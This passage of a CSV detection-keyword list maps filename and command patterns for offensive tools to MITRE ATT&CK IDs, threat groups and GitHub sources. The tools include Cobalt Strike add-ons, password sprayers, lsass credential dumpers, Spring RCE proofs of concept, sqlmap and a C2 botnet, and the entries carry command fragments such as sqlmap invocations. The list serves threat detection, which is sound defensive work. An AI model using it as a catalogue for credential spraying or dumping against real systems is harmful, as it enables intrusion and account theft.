Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*spoolsystem.cna*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*SpoolTrigger.x64.dl*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*SpoolTrigger.x64.dll*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*SpoolTrigger.x86.dl*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*SpoolTrigger.x86.dll*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*SpoolTrigger\SpoolTrigger.*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*spray* --recon *.* -u *.txt --threads 10*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*Spray365.git*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"*spray365.py*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"*spray365_results_*.json*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"*Spray-AD *","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","0","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*Spray-AD.cna*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*Spray-AD.dll*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*Spray-AD.exe*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*Spray-AD.sln*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*Spray-AD\Spray-AD*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","0","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*sprayhound -*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"*sprayhound -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*sprayhound-master.zip*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"*SprayingToolkit.git*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*SprayingToolkit-master*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*SprayingToolkit-master.zip*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*spraykatz*","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","1","N/A","N/A","8","737","126","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z" +"*spring_framework_malicious_jar*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Spring-cloud-function-SpEL-RCE*","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A",,"N/A",,, +"*spring-core-rce*ROOT.war*","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" +"*springFramework_CVE-2022-22965_RCE.py*","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","N/A","N/A","1","76","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z" +"*spyonweb-get-rootdomains *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*sql_persister.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*SqlClrPayload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*sqldumper.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*sqli_common_shared.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Sqli-lab*","offensive_tool_keyword","sqli-labs","SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios:","T1190 - T1553","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/Audi-1/sqli-labs","1","1","N/A","N/A","10","4688","1475","2020-06-04T19:51:55Z","2012-05-19T19:41:26Z" +"*SQL-Injection-Auth-Bypass-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*SQL-Injection-Libraries*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*SQL-Injection-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*SQLiPy.py*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" +"*SQLiScanner*","offensive_tool_keyword","SQLiScanner","Automatic SQL injection with Charles and sqlmapapi","T1190 - T1556 - T1210 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Web Attacks","https://github.com/0xbug/SQLiScanner","1","1","N/A","N/A","8","760","298","2018-05-01T09:59:47Z","2016-08-28T06:06:32Z" +"*sqlite:///ares.db*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*sqlmap -*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmap --forms --batch -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*sqlmap.conf*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmap.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" 